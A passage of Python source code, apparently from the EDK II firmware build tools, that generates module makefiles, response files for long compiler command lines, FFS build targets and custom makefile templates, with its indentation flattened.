\t${END}\t$(RM) AutoGenTimeStamp
#
# clean all generated files
#
cleanall:
${BEGIN}\t${cleanall_command}
${END}\t$(RM) *.pdb *.idb > NUL 2>&1
\t$(RM) $(BIN_DIR)${separator}$(MODULE_NAME).efi
\t$(RM) AutoGenTimeStamp
#
# clean all dependent libraries built
#
cleanlib:
\t${BEGIN}-@${library_build_command} cleanall
\t${END}@cd $(MODULE_BUILD_DIR)\n\n''')
_FILE_MACRO_TEMPLATE = TemplateString("${macro_name} = ${BEGIN} \\\n ${source_file}${END}\n")
_BUILD_TARGET_TEMPLATE = TemplateString("${BEGIN}${target} : ${deps}\n${END}\t${cmd}\n")
## Constructor of ModuleMakefile
#
# @param ModuleAutoGen Object of ModuleAutoGen class
#
def __init__(self, ModuleAutoGen):
BuildFile.__init__(self, ModuleAutoGen)
self.PlatformInfo = self._AutoGenObject.PlatformInfo
self.ResultFileList = []
self.IntermediateDirectoryList = ["$(DEBUG_DIR)", "$(OUTPUT_DIR)"]
self.FileBuildTargetList = [] # [(src, target string)]
self.BuildTargetList = [] # [target string]
self.PendingBuildTargetList = [] # [FileBuildRule objects]
self.CommonFileDependency = []
self.FileListMacros = {}
self.ListFileMacros = {}
self.ObjTargetDict = OrderedDict()
self.FileCache = {}
self.LibraryBuildCommandList = []
self.LibraryFileList = []
self.LibraryMakefileList = []
self.LibraryBuildDirectoryList = []
self.SystemLibraryList = []
self.Macros = OrderedDict()
self.Macros["OUTPUT_DIR" ] = self._AutoGenObject.Macros["OUTPUT_DIR"]
self.Macros["DEBUG_DIR" ] = self._AutoGenObject.Macros["DEBUG_DIR"]
self.Macros["MODULE_BUILD_DIR"] = self._AutoGenObject.Macros["MODULE_BUILD_DIR"]
self.Macros["BIN_DIR" ] = self._AutoGenObject.Macros["BIN_DIR"]
self.Macros["BUILD_DIR" ] = self._AutoGenObject.Macros["BUILD_DIR"]
self.Macros["WORKSPACE" ] = self._AutoGenObject.Macros["WORKSPACE"]
self.Macros["FFS_OUTPUT_DIR" ] = self._AutoGenObject.Macros["FFS_OUTPUT_DIR"]
self.GenFfsList = ModuleAutoGen.GenFfsList
self.MacroList = ['FFS_OUTPUT_DIR', 'MODULE_GUID', 'OUTPUT_DIR']
self.FfsOutputFileList = []
self.DependencyHeaderFileSet = set()
# Compose a dict object containing information used to do replacement in template
@property
def _TemplateDict(self):
MyAgo = self._AutoGenObject
Separator = self._SEP_[self._Platform]
# break build if no source files and binary files are found
if len(MyAgo.SourceFileList) == 0 and len(MyAgo.BinaryFileList) == 0:
EdkLogger.error("build", AUTOGEN_ERROR, "No files to be built in module [%s, %s, %s]"
% (MyAgo.BuildTarget, MyAgo.ToolChain, MyAgo.Arch),
ExtraData="[%s]" % str(MyAgo))
# convert dependent libraries to build command
self.ProcessDependentLibrary()
if len(MyAgo.Module.ModuleEntryPointList) > 0:
ModuleEntryPoint = MyAgo.Module.ModuleEntryPointList[0]
else:
ModuleEntryPoint = "_ModuleEntryPoint"
ArchEntryPoint = ModuleEntryPoint
if MyAgo.Arch == "EBC":
# EBC compiler always use "EfiStart" as entry point. Only applies to EdkII modules
ImageEntryPoint = "EfiStart"
else:
# EdkII modules always use "_ModuleEntryPoint" as entry point
ImageEntryPoint = "_ModuleEntryPoint"
for k, v in MyAgo.Module.Defines.items():
if k not in MyAgo.Macros:
MyAgo.Macros[k] = v
if 'MODULE_ENTRY_POINT' not in MyAgo.Macros:
MyAgo.Macros['MODULE_ENTRY_POINT'] = ModuleEntryPoint
if 'ARCH_ENTRY_POINT' not in MyAgo.Macros:
MyAgo.Macros['ARCH_ENTRY_POINT'] = ArchEntryPoint
if 'IMAGE_ENTRY_POINT' not in MyAgo.Macros:
MyAgo.Macros['IMAGE_ENTRY_POINT'] = ImageEntryPoint
PCI_COMPRESS_Flag = False
for k, v in MyAgo.Module.Defines.items():
if 'PCI_COMPRESS' == k and 'TRUE' == v:
PCI_COMPRESS_Flag = True
# tools definitions
ToolsDef = []
IncPrefix = self._INC_FLAG_[MyAgo.ToolChainFamily]
for Tool in MyAgo.BuildOption:
for Attr in MyAgo.BuildOption[Tool]:
Value = MyAgo.BuildOption[Tool][Attr]
if Attr == "FAMILY":
continue
elif Attr == "PATH":
ToolsDef.append("%s = %s" % (Tool, Value))
else:
# Don't generate MAKE_FLAGS in makefile. It's put in environment variable.
if Tool == "MAKE":
continue
# Remove duplicated include path, if any
if Attr == "FLAGS":
Value = RemoveDupOption(Value, IncPrefix, MyAgo.IncludePathList)
if Tool == "OPTROM" and PCI_COMPRESS_Flag:
ValueList = Value.split()
if ValueList:
for i, v in enumerate(ValueList):
if '-e' == v:
ValueList[i] = '-ec'
Value = ' '.join(ValueList)
ToolsDef.append("%s_%s = %s" % (Tool, Attr, Value))
ToolsDef.append("")
# generate the Response file and Response flag
RespDict = self.CommandExceedLimit()
RespFileList = os.path.join(MyAgo.OutputDir, 'respfilelist.txt')
if RespDict:
RespFileListContent = ''
for Resp in RespDict:
RespFile = os.path.join(MyAgo.OutputDir, str(Resp).lower() + '.txt')
StrList = RespDict[Resp].split(' ')
UnexpandMacro = []
NewStr = []
for Str in StrList:
if '$' in Str or '-MMD' in Str or '-MF' in Str:
UnexpandMacro.append(Str)
else:
NewStr.append(Str)
UnexpandMacroStr = ' '.join(UnexpandMacro)
NewRespStr = ' '.join(NewStr)
SaveFileOnChange(RespFile, NewRespStr, False)
ToolsDef.append("%s = %s" % (Resp, UnexpandMacroStr + ' @' + RespFile))
RespFileListContent += '@' + RespFile + TAB_LINE_BREAK
RespFileListContent += NewRespStr + TAB_LINE_BREAK
SaveFileOnChange(RespFileList, RespFileListContent, False)
else:
if os.path.exists(RespFileList):
os.remove(RespFileList)
# convert source files and binary files to build targets
self.ResultFileList = [str(T.Target) for T in MyAgo.CodaTargetList]
if len(self.ResultFileList) == 0 and len(MyAgo.SourceFileList) != 0:
EdkLogger.error("build", AUTOGEN_ERROR, "Nothing to build",
ExtraData="[%s]" % str(MyAgo))
self.ProcessBuildTargetList()
self.ParserGenerateFfsCmd()
# Generate macros used to represent input files
FileMacroList = [] # macro name = file list
for FileListMacro in self.FileListMacros:
FileMacro = self._FILE_MACRO_TEMPLATE.Replace(
{
"macro_name" : FileListMacro,
"source_file" : self.FileListMacros[FileListMacro]
}
)
FileMacroList.append(FileMacro)
# INC_LIST is special
FileMacro = ""
IncludePathList = []
for P in MyAgo.IncludePathList:
IncludePathList.append(IncPrefix + self.PlaceMacro(P, self.Macros))
if FileBuildRule.INC_LIST_MACRO in self.ListFileMacros:
self.ListFileMacros[FileBuildRule.INC_LIST_MACRO].append(IncPrefix + P)
FileMacro += self._FILE_MACRO_TEMPLATE.Replace(
{
"macro_name" : "INC",
"source_file" : IncludePathList
}
)
FileMacroList.append(FileMacro)
# Add support when compiling .nasm source files
IncludePathList = []
asmsource = [item for item in MyAgo.SourceFileList if item.File.upper().endswith((".NASM",".ASM",".NASMB","S"))]
if asmsource:
for P in MyAgo.IncludePathList:
IncludePath = self._INC_FLAG_['NASM'] + self.PlaceMacro(P, self.Macros)
if IncludePath.endswith(os.sep):
IncludePath = IncludePath.rstrip(os.sep)
# When compiling .nasm files, need to add a literal backslash at each path.
# In nmake makefiles, a trailing literal backslash must be escaped with a caret ('^').
# It is otherwise replaced with a space (' '). This is not necessary for GNU makefiles.
if P == MyAgo.IncludePathList[-1] and self._Platform == WIN32_PLATFORM and self._FileType == NMAKE_FILETYPE:
IncludePath = ''.join([IncludePath, '^', os.sep])
else:
IncludePath = os.path.join(IncludePath, '')
IncludePathList.append(IncludePath)
FileMacroList.append(self._FILE_MACRO_TEMPLATE.Replace({"macro_name": "NASM_INC", "source_file": IncludePathList}))
# Generate macros used to represent files containing list of input files
for ListFileMacro in self.ListFileMacros:
ListFileName = os.path.join(MyAgo.OutputDir, "%s.lst" % ListFileMacro.lower()[:len(ListFileMacro) - 5])
FileMacroList.append("%s = %s" % (ListFileMacro, ListFileName))
SaveFileOnChange(
ListFileName,
"\n".join(self.ListFileMacros[ListFileMacro]),
False
)
# Generate objlist used to create .obj file
for Type in self.ObjTargetDict:
NewLine = ' '.join(list(self.ObjTargetDict[Type]))
FileMacroList.append("OBJLIST_%s = %s" % (list(self.ObjTargetDict.keys()).index(Type), NewLine))
BcTargetList = []
MakefileName = self.getMakefileName()
LibraryMakeCommandList = []
for D in self.LibraryBuildDirectoryList:
Command = self._MAKE_TEMPLATE_[self._Platform] % {"file":os.path.join(D, MakefileName)}
LibraryMakeCommandList.append(Command)
package_rel_dir = MyAgo.SourceDir
current_dir = self.Macros["WORKSPACE"]
found = False
while not found and os.sep in package_rel_dir:
index = package_rel_dir.index(os.sep)
current_dir = mws.join(current_dir, package_rel_dir[:index])
if os.path.exists(current_dir):
for fl in os.listdir(current_dir):
if fl.endswith('.dec'):
found = True
break
package_rel_dir = package_rel_dir[index + 1:]
MakefileTemplateDict = {
"makefile_header" : self._FILE_HEADER_[self._FileType],
"makefile_path" : os.path.join("$(MODULE_BUILD_DIR)", MakefileName),
"makefile_name" : MakefileName,
"platform_name" : self.PlatformInfo.Name,
"platform_guid" : self.PlatformInfo.Guid,
"platform_version" : self.PlatformInfo.Version,
"platform_relative_directory": self.PlatformInfo.SourceDir,
"platform_output_directory" : self.PlatformInfo.OutputDir,
"ffs_output_directory" : MyAgo.Macros["FFS_OUTPUT_DIR"],
"platform_dir" : MyAgo.Macros["PLATFORM_DIR"],
"module_name" : MyAgo.Name,
"module_guid" : MyAgo.Guid,
"module_name_guid" : MyAgo.UniqueBaseName,
"module_version" : MyAgo.Version,
"module_type" : MyAgo.ModuleType,
"module_file" : MyAgo.MetaFile.Name,
"module_file_base_name" : MyAgo.MetaFile.BaseName,
"module_relative_directory" : MyAgo.SourceDir,
"module_dir" : mws.join (self.Macros["WORKSPACE"], MyAgo.SourceDir),
"package_relative_directory": package_rel_dir,
"module_extra_defines" : ["%s = %s" % (k, v) for k, v in MyAgo.Module.Defines.items()],
"architecture" : MyAgo.Arch,
"toolchain_tag" : MyAgo.ToolChain,
"build_target" : MyAgo.BuildTarget,
"platform_build_directory" : self.PlatformInfo.BuildDir,
"module_build_directory" : MyAgo.BuildDir,
"module_output_directory" : MyAgo.OutputDir,
"module_debug_directory" : MyAgo.DebugDir,
"separator" : Separator,
"module_tool_definitions" : ToolsDef,
"shell_command_code" : list(self._SHELL_CMD_[self._Platform].keys()),
"shell_command" : list(self._SHELL_CMD_[self._Platform].values()),
"module_entry_point" : ModuleEntryPoint,
"image_entry_point" : ImageEntryPoint,
"arch_entry_point" : ArchEntryPoint,
"remaining_build_target" : self.ResultFileList,
"common_dependency_file" : self.CommonFileDependency,
"create_directory_command" : self.GetCreateDirectoryCommand(self.IntermediateDirectoryList),
"clean_command" : self.GetRemoveDirectoryCommand(["$(OUTPUT_DIR)"]),
"cleanall_command" : self.GetRemoveDirectoryCommand(["$(DEBUG_DIR)", "$(OUTPUT_DIR)"]),
"dependent_library_build_directory" : self.LibraryBuildDirectoryList,
"library_build_command" : LibraryMakeCommandList,
"file_macro" : FileMacroList,
"file_build_target" : self.BuildTargetList,
"backward_compatible_target": BcTargetList,
"INCLUDETAG" : "\n".join([self._INCLUDE_CMD_[self._FileType] + " " + os.path.join("$(MODULE_BUILD_DIR)","dependency"),
self._INCLUDE_CMD_[self._FileType] + " " + os.path.join("$(MODULE_BUILD_DIR)","deps_target")
])
}
return MakefileTemplateDict
def ParserGenerateFfsCmd(self):
#Add Ffs cmd to self.BuildTargetList
OutputFile = ''
DepsFileList = []
for Cmd in self.GenFfsList:
if Cmd[2]:
for CopyCmd in Cmd[2]:
Src, Dst = CopyCmd
Src = self.ReplaceMacro(Src)
Dst = self.ReplaceMacro(Dst)
if Dst not in self.ResultFileList:
self.ResultFileList.append(Dst)
if '%s :' %(Dst) not in self.BuildTargetList:
self.BuildTargetList.append("%s : %s" %(Dst,Src))
self.BuildTargetList.append('\t' + self._CP_TEMPLATE_[self._Platform] %{'Src': Src, 'Dst': Dst})
FfsCmdList = Cmd[0]
for index, Str in enumerate(FfsCmdList):
if '-o' == Str:
OutputFile = FfsCmdList[index + 1]
if '-i' == Str or "-oi" == Str:
if DepsFileList == []:
DepsFileList = [FfsCmdList[index + 1]]
else:
DepsFileList.append(FfsCmdList[index + 1])
DepsFileString = ' '.join(DepsFileList).strip()
if DepsFileString == '':
continue
OutputFile = self.ReplaceMacro(OutputFile)
self.ResultFileList.append(OutputFile)
DepsFileString = self.ReplaceMacro(DepsFileString)
self.BuildTargetList.append('%s : %s' % (OutputFile, DepsFileString))
CmdString = ' '.join(FfsCmdList).strip()
CmdString = self.ReplaceMacro(CmdString)
self.BuildTargetList.append('\t%s' % CmdString)
self.ParseSecCmd(DepsFileList, Cmd[1])
for SecOutputFile, SecDepsFile, SecCmd in self.FfsOutputFileList :
self.BuildTargetList.append('%s : %s' % (self.ReplaceMacro(SecOutputFile), self.ReplaceMacro(SecDepsFile)))
self.BuildTargetList.append('\t%s' % self.ReplaceMacro(SecCmd))
self.FfsOutputFileList = []
def ParseSecCmd(self, OutputFileList, CmdTuple):
for OutputFile in OutputFileList:
for SecCmdStr in CmdTuple:
SecDepsFileList = []
SecCmdList = SecCmdStr.split()
CmdName = SecCmdList[0]
for index, CmdItem in enumerate(SecCmdList):
if '-o' == CmdItem and OutputFile == SecCmdList[index + 1]:
index = index + 1
while index + 1 < len(SecCmdList):
if not SecCmdList[index+1].startswith('-'):
SecDepsFileList.append(SecCmdList[index + 1])
index = index + 1
if CmdName == 'Trim':
SecDepsFileList.append(os.path.join('$(DEBUG_DIR)', os.path.basename(OutputFile).replace('offset', 'efi')))
if OutputFile.endswith('.ui') or OutputFile.endswith('.ver'):
SecDepsFileList.append(os.path.join('$(MODULE_DIR)', '$(MODULE_FILE)'))
self.FfsOutputFileList.append((OutputFile, ' '.join(SecDepsFileList), SecCmdStr))
if len(SecDepsFileList) > 0:
self.ParseSecCmd(SecDepsFileList, CmdTuple)
break
else:
continue
def ReplaceMacro(self, str):
for Macro in self.MacroList:
if self._AutoGenObject.Macros[Macro] and self._AutoGenObject.Macros[Macro] in str:
str = str.replace(self._AutoGenObject.Macros[Macro], '$(' + Macro + ')')
return str
def CommandExceedLimit(self):
FlagDict = {
'CC' : { 'Macro' : '$(CC_FLAGS)', 'Value' : False},
'PP' : { 'Macro' : '$(PP_FLAGS)', 'Value' : False},
'APP' : { 'Macro' : '$(APP_FLAGS)', 'Value' : False},
'ASLPP' : { 'Macro' : '$(ASLPP_FLAGS)', 'Value' : False},
'VFRPP' : { 'Macro' : '$(VFRPP_FLAGS)', 'Value' : False},
'ASM' : { 'Macro' : '$(ASM_FLAGS)', 'Value' : False},
'ASLCC' : { 'Macro' : '$(ASLCC_FLAGS)', 'Value' : False},
}
RespDict = {}
FileTypeList = []
IncPrefix = self._INC_FLAG_[self._AutoGenObject.ToolChainFamily]
        # based on the source files, decide the file types
for File in self._AutoGenObject.SourceFileList:
for type in self._AutoGenObject.FileTypes:
if File in self._AutoGenObject.FileTypes[type]:
if type not in FileTypeList:
FileTypeList.append(type)
# calculate the command-line length
if FileTypeList:
for type in FileTypeList:
BuildTargets = self._AutoGenObject.BuildRules[type].BuildTargets
for Target in BuildTargets:
CommandList = BuildTargets[Target].Commands
for SingleCommand in CommandList:
Tool = ''
SingleCommandLength = len(SingleCommand)
SingleCommandList = SingleCommand.split()
if len(SingleCommandList) > 0:
for Flag in FlagDict:
if '$('+ Flag +')' in SingleCommandList[0]:
Tool = Flag
break
if Tool:
if 'PATH' not in self._AutoGenObject.BuildOption[Tool]:
EdkLogger.error("build", AUTOGEN_ERROR, "%s_PATH doesn't exist in %s ToolChain and %s Arch." %(Tool, self._AutoGenObject.ToolChain, self._AutoGenObject.Arch), ExtraData="[%s]" % str(self._AutoGenObject))
SingleCommandLength += len(self._AutoGenObject.BuildOption[Tool]['PATH'])
for item in SingleCommandList[1:]:
if FlagDict[Tool]['Macro'] in item:
if 'FLAGS' not in self._AutoGenObject.BuildOption[Tool]:
EdkLogger.error("build", AUTOGEN_ERROR, "%s_FLAGS doesn't exist in %s ToolChain and %s Arch." %(Tool, self._AutoGenObject.ToolChain, self._AutoGenObject.Arch), ExtraData="[%s]" % str(self._AutoGenObject))
Str = self._AutoGenObject.BuildOption[Tool]['FLAGS']
for Option in self._AutoGenObject.BuildOption:
for Attr in self._AutoGenObject.BuildOption[Option]:
if Str.find(Option + '_' + Attr) != -1:
Str = Str.replace('$(' + Option + '_' + Attr + ')', self._AutoGenObject.BuildOption[Option][Attr])
while(Str.find('$(') != -1):
for macro in self._AutoGenObject.Macros:
MacroName = '$('+ macro + ')'
if (Str.find(MacroName) != -1):
Str = Str.replace(MacroName, self._AutoGenObject.Macros[macro])
break
else:
break
SingleCommandLength += len(Str)
elif '$(INC)' in item:
SingleCommandLength += self._AutoGenObject.IncludePathLength + len(IncPrefix) * len(self._AutoGenObject.IncludePathList)
elif item.find('$(') != -1:
Str = item
for Option in self._AutoGenObject.BuildOption:
for Attr in self._AutoGenObject.BuildOption[Option]:
if Str.find(Option + '_' + Attr) != -1:
Str = Str.replace('$(' + Option + '_' + Attr + ')', self._AutoGenObject.BuildOption[Option][Attr])
while(Str.find('$(') != -1):
for macro in self._AutoGenObject.Macros:
MacroName = '$('+ macro + ')'
if (Str.find(MacroName) != -1):
Str = Str.replace(MacroName, self._AutoGenObject.Macros[macro])
break
else:
break
SingleCommandLength += len(Str)
if SingleCommandLength > GlobalData.gCommandMaxLength:
FlagDict[Tool]['Value'] = True
        # generate the response file content by combining the FLAGS and INC
for Flag in FlagDict:
if FlagDict[Flag]['Value']:
Key = Flag + '_RESP'
RespMacro = FlagDict[Flag]['Macro'].replace('FLAGS', 'RESP')
Value = self._AutoGenObject.BuildOption[Flag]['FLAGS']
for inc in self._AutoGenObject.IncludePathList:
Value += ' ' + IncPrefix + inc
for Option in self._AutoGenObject.BuildOption:
for Attr in self._AutoGenObject.BuildOption[Option]:
if Value.find(Option + '_' + Attr) != -1:
Value = Value.replace('$(' + Option + '_' + Attr + ')', self._AutoGenObject.BuildOption[Option][Attr])
while (Value.find('$(') != -1):
for macro in self._AutoGenObject.Macros:
MacroName = '$('+ macro + ')'
if (Value.find(MacroName) != -1):
Value = Value.replace(MacroName, self._AutoGenObject.Macros[macro])
break
else:
break
if self._AutoGenObject.ToolChainFamily == 'GCC':
RespDict[Key] = Value.replace('\\', '/')
else:
RespDict[Key] = Value
for Target in BuildTargets:
for i, SingleCommand in enumerate(BuildTargets[Target].Commands):
if FlagDict[Flag]['Macro'] in SingleCommand:
BuildTargets[Target].Commands[i] = SingleCommand.replace('$(INC)', '').replace(FlagDict[Flag]['Macro'], RespMacro)
return RespDict
def ProcessBuildTargetList(self):
#
# Search dependency file list for each source file
#
ForceIncludedFile = []
for File in self._AutoGenObject.AutoGenFileList:
if File.Ext == '.h':
ForceIncludedFile.append(File)
SourceFileList = []
OutPutFileList = []
for Target in self._AutoGenObject.IntroTargetList:
SourceFileList.extend(Target.Inputs)
OutPutFileList.extend(Target.Outputs)
if OutPutFileList:
for Item in OutPutFileList:
if Item in SourceFileList:
SourceFileList.remove(Item)
FileDependencyDict = {item:ForceIncludedFile for item in SourceFileList}
for Dependency in FileDependencyDict.values():
self.DependencyHeaderFileSet.update(set(Dependency))
# Get a set of unique package includes from MetaFile
parentMetaFileIncludes = set()
for aInclude in self._AutoGenObject.PackageIncludePathList:
aIncludeName = str(aInclude)
parentMetaFileIncludes.add(aIncludeName.lower())
# Check if header files are listed in metafile
# Get a set of unique module header source files from MetaFile
headerFilesInMetaFileSet = set()
for aFile in self._AutoGenObject.SourceFileList:
aFileName = str(aFile)
if not aFileName.endswith('.h'):
continue
headerFilesInMetaFileSet.add(aFileName.lower())
# Get a set of unique module autogen files
localAutoGenFileSet = set()
for aFile in self._AutoGenObject.AutoGenFileList:
localAutoGenFileSet.add(str(aFile).lower())
# Get a set of unique module dependency header files
# Exclude autogen files and files not in the source directory
# and files that are under the package include list
headerFileDependencySet = set()
localSourceDir = str(self._AutoGenObject.SourceDir).lower()
for Dependency in FileDependencyDict.values():
for aFile in Dependency:
aFileName = str(aFile).lower()
# Exclude non-header files
if not aFileName.endswith('.h'):
continue
# Exclude autogen files
if aFileName in localAutoGenFileSet:
continue
                # Exclude includes that are outside the local source directory
if localSourceDir not in aFileName:
continue
# Exclude files covered by package includes
pathNeeded = True
for aIncludePath in parentMetaFileIncludes:
if aIncludePath in aFileName:
pathNeeded = False
break
if not pathNeeded:
continue
# Keep the file to be checked
headerFileDependencySet.add(aFileName)
# Check if a module dependency header file is missing from the module's MetaFile
for aFile in headerFileDependencySet:
if aFile in headerFilesInMetaFileSet:
continue
if GlobalData.gUseHashCache:
GlobalData.gModuleBuildTracking[self._AutoGenObject] = 'FAIL_METAFILE'
EdkLogger.warn("build","Module MetaFile [Sources] is missing local header!",
ExtraData = "Local Header: " + aFile + " not found in " + self._AutoGenObject.MetaFile.Path
)
for File,Dependency in FileDependencyDict.items():
if not Dependency:
continue
self._AutoGenObject.AutoGenDepSet |= set(Dependency)
CmdSumDict = {}
CmdTargetDict = {}
CmdCppDict = {}
DependencyDict = FileDependencyDict.copy()
# Convert target description object to target string in makefile
if self._AutoGenObject.BuildRuleFamily == TAB_COMPILER_MSFT and TAB_C_CODE_FILE in self._AutoGenObject.Targets:
for T in self._AutoGenObject.Targets[TAB_C_CODE_FILE]:
NewFile = self.PlaceMacro(str(T), self.Macros)
if not self.ObjTargetDict.get(T.Target.SubDir):
self.ObjTargetDict[T.Target.SubDir] = set()
self.ObjTargetDict[T.Target.SubDir].add(NewFile)
for Type in self._AutoGenObject.Targets:
for T in self._AutoGenObject.Targets[Type]:
# Generate related macros if needed
if T.GenFileListMacro and T.FileListMacro not in self.FileListMacros:
self.FileListMacros[T.FileListMacro] = []
if T.GenListFile and T.ListFileMacro not in self.ListFileMacros:
self.ListFileMacros[T.ListFileMacro] = []
if T.GenIncListFile and T.IncListFileMacro not in self.ListFileMacros:
self.ListFileMacros[T.IncListFileMacro] = []
Deps = []
CCodeDeps = []
# Add force-dependencies
for Dep in T.Dependencies:
Deps.append(self.PlaceMacro(str(Dep), self.Macros))
if Dep != '$(MAKE_FILE)':
CCodeDeps.append(self.PlaceMacro(str(Dep), self.Macros))
# Add inclusion-dependencies
if len(T.Inputs) == 1 and T.Inputs[0] in FileDependencyDict:
for F in FileDependencyDict[T.Inputs[0]]:
Deps.append(self.PlaceMacro(str(F), self.Macros))
# Add source-dependencies
for F in T.Inputs:
NewFile = self.PlaceMacro(str(F), self.Macros)
# In order to use file list macro as dependency
if T.GenListFile:
# gnu tools need forward slash path separator, even on Windows
self.ListFileMacros[T.ListFileMacro].append(str(F).replace ('\\', '/'))
self.FileListMacros[T.FileListMacro].append(NewFile)
elif T.GenFileListMacro:
self.FileListMacros[T.FileListMacro].append(NewFile)
else:
Deps.append(NewFile)
for key in self.FileListMacros:
self.FileListMacros[key].sort()
# Use file list macro as dependency
if T.GenFileListMacro:
Deps.append("$(%s)" % T.FileListMacro)
if Type in [TAB_OBJECT_FILE, TAB_STATIC_LIBRARY]:
Deps.append("$(%s)" % T.ListFileMacro)
if self._AutoGenObject.BuildRuleFamily == TAB_COMPILER_MSFT and Type == TAB_C_CODE_FILE:
T, CmdTarget, CmdTargetDict, CmdCppDict = self.ParserCCodeFile(T, Type, CmdSumDict, CmdTargetDict, CmdCppDict, DependencyDict)
TargetDict = {"target": self.PlaceMacro(T.Target.Path, self.Macros), "cmd": "\n\t".join(T.Commands),"deps": CCodeDeps}
CmdLine = self._BUILD_TARGET_TEMPLATE.Replace(TargetDict).rstrip().replace('\t$(OBJLIST', '$(OBJLIST')
if T.Commands:
CmdLine = '%s%s' %(CmdLine, TAB_LINE_BREAK)
if CCodeDeps or CmdLine:
self.BuildTargetList.append(CmdLine)
else:
TargetDict = {"target": self.PlaceMacro(T.Target.Path, self.Macros), "cmd": "\n\t".join(T.Commands),"deps": Deps}
self.BuildTargetList.append(self._BUILD_TARGET_TEMPLATE.Replace(TargetDict))
# Add a Makefile rule for targets generating multiple files.
# The main output is a prerequisite for the other output files.
for i in T.Outputs[1:]:
AnnexeTargetDict = {"target": self.PlaceMacro(i.Path, self.Macros), "cmd": "", "deps": self.PlaceMacro(T.Target.Path, self.Macros)}
self.BuildTargetList.append(self._BUILD_TARGET_TEMPLATE.Replace(AnnexeTargetDict))
def ParserCCodeFile(self, T, Type, CmdSumDict, CmdTargetDict, CmdCppDict, DependencyDict):
if not CmdSumDict:
for item in self._AutoGenObject.Targets[Type]:
CmdSumDict[item.Target.SubDir] = item.Target.BaseName
for CppPath in item.Inputs:
Path = self.PlaceMacro(CppPath.Path, self.Macros)
if CmdCppDict.get(item.Target.SubDir):
CmdCppDict[item.Target.SubDir].append(Path)
else:
CmdCppDict[item.Target.SubDir] = ['$(MAKE_FILE)', Path]
if CppPath.Path in DependencyDict:
for Temp in DependencyDict[CppPath.Path]:
try:
Path = self.PlaceMacro(Temp.Path, self.Macros)
except:
continue
if Path not in (self.CommonFileDependency + CmdCppDict[item.Target.SubDir]):
CmdCppDict[item.Target.SubDir].append(Path)
if T.Commands:
CommandList = T.Commands[:]
for Item in CommandList[:]:
SingleCommandList = Item.split()
if len(SingleCommandList) > 0 and self.CheckCCCmd(SingleCommandList):
for Temp in SingleCommandList:
if Temp.startswith('/Fo'):
CmdSign = '%s%s' % (Temp.rsplit(TAB_SLASH, 1)[0], TAB_SLASH)
break
else: continue
if CmdSign not in list(CmdTargetDict.keys()):
CmdTargetDict[CmdSign] = Item.replace(Temp, CmdSign)
else:
CmdTargetDict[CmdSign] = "%s %s" % (CmdTargetDict[CmdSign], SingleCommandList[-1])
Index = CommandList.index(Item)
CommandList.pop(Index)
if SingleCommandList[-1].endswith("%s%s.c" % (TAB_SLASH, CmdSumDict[CmdSign[3:].rsplit(TAB_SLASH, 1)[0]])):
Cpplist = CmdCppDict[T.Target.SubDir]
Cpplist.insert(0, '$(OBJLIST_%d): ' % list(self.ObjTargetDict.keys()).index(T.Target.SubDir))
T.Commands[Index] = '%s\n\t%s' % (' \\\n\t'.join(Cpplist), CmdTargetDict[CmdSign])
else:
T.Commands.pop(Index)
return T, CmdSumDict, CmdTargetDict, CmdCppDict
def CheckCCCmd(self, CommandList):
for cmd in CommandList:
if '$(CC)' in cmd:
return True
return False
## For creating makefile targets for dependent libraries
def ProcessDependentLibrary(self):
for LibraryAutoGen in self._AutoGenObject.LibraryAutoGenList:
if not LibraryAutoGen.IsBinaryModule:
self.LibraryBuildDirectoryList.append(self.PlaceMacro(LibraryAutoGen.BuildDir, self.Macros))
## Return a list containing source file's dependencies
#
    # @param FileList The list of source files
    # @param ForceInculeList The list of files which will be forcibly included
    # @param SearchPathList The list of search paths
#
# @retval dict The mapping between source file path and its dependencies
#
def GetFileDependency(self, FileList, ForceInculeList, SearchPathList):
Dependency = {}
for F in FileList:
Dependency[F] = GetDependencyList(self._AutoGenObject, self.FileCache, F, ForceInculeList, SearchPathList)
return Dependency
## CustomMakefile class
#
# This class encapsulates the makefile and its generation for a module. It uses a template
# to generate the content of the makefile, which is obtained from the ModuleAutoGen object.
#
class CustomMakefile(BuildFile):
## template used to generate the makefile for module with custom makefile
_TEMPLATE_ = TemplateString('''\
${makefile_header}
#
# Platform Macro Definition
#
PLATFORM_NAME = ${platform_name}
PLATFORM_GUID = ${platform_guid}
PLATFORM_VERSION = ${platform_version}
PLATFORM_RELATIVE_DIR = ${platform_relative_directory}
PLATFORM_DIR = ${platform_dir}
PLATFORM_OUTPUT_DIR = ${platform_output_directory}
#
# Module Macro Definition
#
MODULE_NAME = ${module_name}
MODULE_GUID = ${module_guid}
MODULE_NAME_GUID = ${module_name_guid}
MODULE_VERSION = ${module_version}
MODULE_TYPE = ${module_type}
MODULE_FILE = ${module_file}
MODULE_FILE_BASE_NAME = ${module_file_base_name}
BASE_NAME = $(MODULE_NAME)
MODULE_RELATIVE_DIR = ${module_relative_directory}
MODULE_DIR = ${module_dir}
#
# Build Configuration Macro Definition
#
ARCH = ${architecture}
TOOLCHAIN = ${toolchain_tag}
TOOLCHAIN_TAG = ${toolchain_tag}
TARGET = ${build_target}
#
# Build Directory Macro Definition
#
# PLATFORM_BUILD_DIR = ${platform_build_directory}
BUILD_DIR = ${platform_build_directory}
BIN_DIR = $(BUILD_DIR)${separator}${architecture}
LIB_DIR = $(BIN_DIR)
MODULE_BUILD_DIR = ${module_build_directory}
OUTPUT_DIR = ${module_output_directory}
DEBUG_DIR = ${module_debug_directory}
DEST_DIR_OUTPUT = $(OUTPUT_DIR)
DEST_DIR_DEBUG = $(DEBUG_DIR)
#
# Tools definitions specific to this module
#
${BEGIN}${module_tool_definitions}
${END}
MAKE_FILE = ${makefile_path}
#
# Shell Command Macro
#
${BEGIN}${shell_command_code} = ${shell_command}
${END}
${custom_makefile_content}
#
# Target used when called from platform makefile, which will bypass the build of dependent libraries
#
pbuild: init all
#
# ModuleTarget
#
mbuild: init all
#
# Build Target used in multi-thread build mode, in which no init target is needed
#
tbuild: all
#
# Initialization target: print build information and create necessary directories
#
init:
\t-@echo Building ... $(MODULE_DIR)${separator}$(MODULE_FILE) [$(ARCH)]
${BEGIN}\t-@${create_directory_command}\n${END}\
''')
## Constructor of CustomMakefile
#
# @param ModuleAutoGen Object of ModuleAutoGen class
#
def __init__(self, ModuleAutoGen):
BuildFile.__init__(self, ModuleAutoGen)
self.PlatformInfo = self._AutoGenObject.PlatformInfo
self.IntermediateDirectoryList = ["$(DEBUG_DIR)", "$(OUTPUT_DIR)"]
self.DependencyHeaderFileSet = set()
# Compose a dict object containing information used to do replacement in template
@property
def _TemplateDict(self):
